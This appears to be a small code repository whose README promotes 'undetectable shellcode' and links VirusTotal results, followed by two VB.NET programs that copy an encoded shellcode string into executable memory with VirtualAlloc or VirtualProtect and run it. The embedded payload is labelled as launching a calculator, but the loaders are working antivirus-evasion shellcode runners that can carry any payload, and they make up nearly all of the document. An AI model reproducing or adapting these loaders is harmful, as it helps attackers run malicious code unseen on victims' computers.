├── README.md
├── VirtualAlloc.vb
└── VirtualProtect.vb


/README.md:
--------------------------------------------------------------------------------
 1 | # Undectable Shellcode using VB.NET
 2 | 
 3 | Write-up:
 4 | https://osandamalith.com/2016/08/01/making-your-shellcode-undetectable-using-net/
 5 | 
 6 | Implementing the VirtualProtect and VirtualAlloc using VB.NET
 7 | 
 8 | VirtualProtect
 9 | https://virustotal.com/en/file/638050acc67b742ca7603baa26f6b5b62835955b63f629c8b9b72f74d9546742/analysis/1469982161/
10 | 
11 | VirtualAlloc
12 | https://virustotal.com/en/file/d21c64b0326994214906ddd9387c3590d2d7bd5367c0bbd5b35377c4d994cb0a/analysis/1469982240/
13 | 


--------------------------------------------------------------------------------
/VirtualAlloc.vb:
--------------------------------------------------------------------------------
 1 | #If AFAC Then
 2 |     CC-By: Osanda Malith Jayathissa (@OsandaMalith)
 3 |     Executing Shellcode using VirtualAlloc in VB.NET
 4 |     Website: https://osandamalith.com
 5 |     https://creativecommons.org/licenses/by/3.0/
 6 | #End If
 7 | 
 8 | Imports System
 9 | Imports System.Runtime.InteropServices
10 | 
11 | Public Class Form1
12 | 
13 |     Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
14 |         ' Calc Shellcode
15 |         Dim shellcode As String = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylJHk9s0C0s0SPmYxeTqzrqtnkaBDpNkV2VlNkpRb4nkqbQ8dOx7rjfFtqyoVQo0nLgLqq1lfbVL10IQ8O6mWqiWZBl0BrSgNkaBDPNkbbwLUQJplKQPpxOukpbTRjWqXPV0nkg828Nkshq0c1N3zCUlQYnk5dlKS1N6eaKOfQYPNLjaxOdMS1kwUhKPQeydtCQmIh7KsM7TBUIrV8LKPX6DgqICpfNkVlrkLKrxWls1zsLK5TNkuQN0Oyg4GTvD3kQKSQqIcjPQkO9pChcobzLKVrJKMVsmBJfaLMMUx9GpEPC0v0E8vQlKBOMWYoyEMkM0wmtjDJCXoVoeoMomyojuEl4FalDJk09kkPQe35mkw7fsd2PoBJ30sciohUbCSQbLbCfNauD8SUs0AA"
16 |         Dim shell_array(shellcode.Length - 1) As Byte
17 |         Dim i As Integer = 0
18 |         Do
19 |             shell_array(i) = Convert.ToByte(shellcode(i))
20 |             i = i + 1
21 | 
22 |         Loop While i < shellcode.Length
23 | 
24 |         Dim baseAddr As IntPtr = VirtualAlloc(IntPtr.Zero, New UIntPtr(CType(shell_array.Length, UInt32)), AllocationType.COMMIT Or AllocationType.RESERVE, MemoryProtection.EXECUTE_READWRITE)
25 |         Try
26 |             Marshal.Copy(shell_array, 0, baseAddr, CInt(shell_array.Length))
27 |             DirectCast(Marshal.GetDelegateForFunctionPointer(baseAddr, GetType(ExecuteDelegate)), ExecuteDelegate)()
28 |         Finally
29 |             VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE)
30 |         End Try
31 |     End Sub
32 | 
33 |     <DllImport("kernel32.dll", CharSet:=CharSet.None, ExactSpelling:=False, SetLastError:=True)>
34 |     Private Shared Function VirtualAlloc(
35 |                 ByVal lpAddress As IntPtr,
36 |                 ByVal dwSize As UIntPtr,
37 |                 ByVal flAllocationType As AllocationType,
38 |                 ByVal flProtect As MemoryProtection) As IntPtr
39 |     End Function
40 | 
41 |     <DllImport("kernel32.dll", CharSet:=CharSet.None, ExactSpelling:=False)>
42 |     Private Shared Function VirtualFree(
43 |                 ByVal lpAddress As IntPtr,
44 |                 ByVal dwSize As UInteger,
45 |                 ByVal dwFreeType As FreeType) As Boolean
46 |     End Function
47 | 
48 |     <Flags>
49 |     Public Enum AllocationType As UInteger
50 |         COMMIT = 4096
51 |         RESERVE = 8192
52 |         RESET = 524288
53 |         TOP_DOWN = 1048576
54 |         WRITE_WATCH = 2097152
55 |         PHYSICAL = 4194304
56 |         LARGE_PAGES = 536870912
57 |     End Enum
58 | 
59 |     <UnmanagedFunctionPointer(CallingConvention.Cdecl)>
60 |     Public Delegate Function ExecuteDelegate() As Integer
61 | 
62 |     Public Enum FreeType As UInteger
63 |         MEM_DECOMMIT = 16384
64 |         MEM_RELEASE = 32768
65 |     End Enum
66 | 
67 |     <Flags>
68 |     Public Enum MemoryProtection As UInteger
69 |         NOACCESS = 1
70 |         [READONLY] = 2
71 |         READWRITE = 4
72 |         WRITECOPY = 8
73 |         EXECUTE = 16
74 |         EXECUTE_READ = 32
75 |         EXECUTE_READWRITE = 64
76 |         EXECUTE_WRITECOPY = 128
77 |         GUARD_Modifierflag = 256
78 |         NOCACHE_Modifierflag = 512
79 |         WRITECOMBINE_Modifierflag = 1024
80 |     End Enum
81 | End Class
82 | 


--------------------------------------------------------------------------------
/VirtualProtect.vb:
--------------------------------------------------------------------------------
 1 | #If AFAC Then
 2 |     CC-By: Osanda Malith Jayathissa (@OsandaMalith)
 3 |     Executing Shellcode using VirtualProtect in VB.NET
 4 |     Website: https://osandamalith.com
 5 |     https://creativecommons.org/licenses/by/3.0/
 6 | #End If
 7 | 
 8 | Imports System
 9 | Imports System.Runtime.InteropServices
10 | Public Class Form1
11 | 
12 |     Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
13 |         ' Calc Shellcode
14 |         Dim shellcode As String = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylJHk9s0C0s0SPmYxeTqzrqtnkaBDpNkV2VlNkpRb4nkqbQ8dOx7rjfFtqyoVQo0nLgLqq1lfbVL10IQ8O6mWqiWZBl0BrSgNkaBDPNkbbwLUQJplKQPpxOukpbTRjWqXPV0nkg828Nkshq0c1N3zCUlQYnk5dlKS1N6eaKOfQYPNLjaxOdMS1kwUhKPQeydtCQmIh7KsM7TBUIrV8LKPX6DgqICpfNkVlrkLKrxWls1zsLK5TNkuQN0Oyg4GTvD3kQKSQqIcjPQkO9pChcobzLKVrJKMVsmBJfaLMMUx9GpEPC0v0E8vQlKBOMWYoyEMkM0wmtjDJCXoVoeoMomyojuEl4FalDJk09kkPQe35mkw7fsd2PoBJ30sciohUbCSQbLbCfNauD8SUs0AA"
15 |         Dim shell_array(shellcode.Length - 1) As Byte
16 |         Dim i As Integer = 0
17 |         Do
18 |             shell_array(i) = Convert.ToByte(shellcode(i))
19 |             i = i + 1
20 | 
21 |         Loop While i < shellcode.Length
22 |         Dim oldProtect As UInt32
23 | 
24 |         VirtualProtect(VarPtr(shell_array), New UIntPtr(CType(shell_array.Length, UInt32)), MemoryProtection.EXECUTE_READWRITE, oldProtect)
25 |         Try
26 |             DirectCast(Marshal.GetDelegateForFunctionPointer(VarPtr(shell_array), GetType(ExecShellcode)), ExecShellcode)()
27 |         Finally
28 |             VirtualProtect(VarPtr(shell_array), New UIntPtr(CType(shell_array.Length, UInt32)), oldProtect, oldProtect)
29 |         End Try
30 |     End Sub
31 | 
32 |     Function VarPtr(ByVal shell As Object) As Integer
33 |         Dim GC As GCHandle = GCHandle.Alloc(shell, GCHandleType.Pinned)
34 |         Dim hAddr As Integer = GC.AddrOfPinnedObject.ToInt32
35 |         GC.Free()
36 |         Return hAddr
37 |     End Function
38 | 
39 |     <DllImport("kernel32.dll", CharSet:=CharSet.None, ExactSpelling:=False, SetLastError:=True)>
40 |     Private Shared Function VirtualProtect(
41 |             ByVal lpAddress As IntPtr,
42 |             ByVal dwSize As UIntPtr,
43 |             ByVal flNewProtect As UInt32,
44 |             <Out()> ByRef lpflOldProtect As UInt32) As Boolean
45 |     End Function
46 | 
47 |     <UnmanagedFunctionPointer(CallingConvention.Cdecl)>
48 |     Public Delegate Function ExecShellcode() As Integer
49 | 
50 |     <Flags>
51 |     Public Enum AllocationType As UInteger
52 |         COMMIT = 4096
53 |         RESERVE = 8192
54 |         RESET = 524288
55 |         TOP_DOWN = 1048576
56 |         WRITE_WATCH = 2097152
57 |         PHYSICAL = 4194304
58 |         LARGE_PAGES = 536870912
59 |     End Enum
60 | 
61 |     Public Enum FreeType As UInteger
62 |         MEM_DECOMMIT = 16384
63 |         MEM_RELEASE = 32768
64 |     End Enum
65 | 
66 |     <Flags>
67 |     Public Enum MemoryProtection As UInteger
68 |         NOACCESS = 1
69 |         [READONLY] = 2
70 |         READWRITE = 4
71 |         WRITECOPY = 8
72 |         EXECUTE = 16
73 |         EXECUTE_READ = 32
74 |         EXECUTE_READWRITE = 64
75 |         EXECUTE_WRITECOPY = 128
76 |         GUARD_Modifierflag = 256
77 |         NOCACHE_Modifierflag = 512
78 |         WRITECOMBINE_Modifierflag = 1024
79 |     End Enum
80 | End Class
81 | 


--------------------------------------------------------------------------------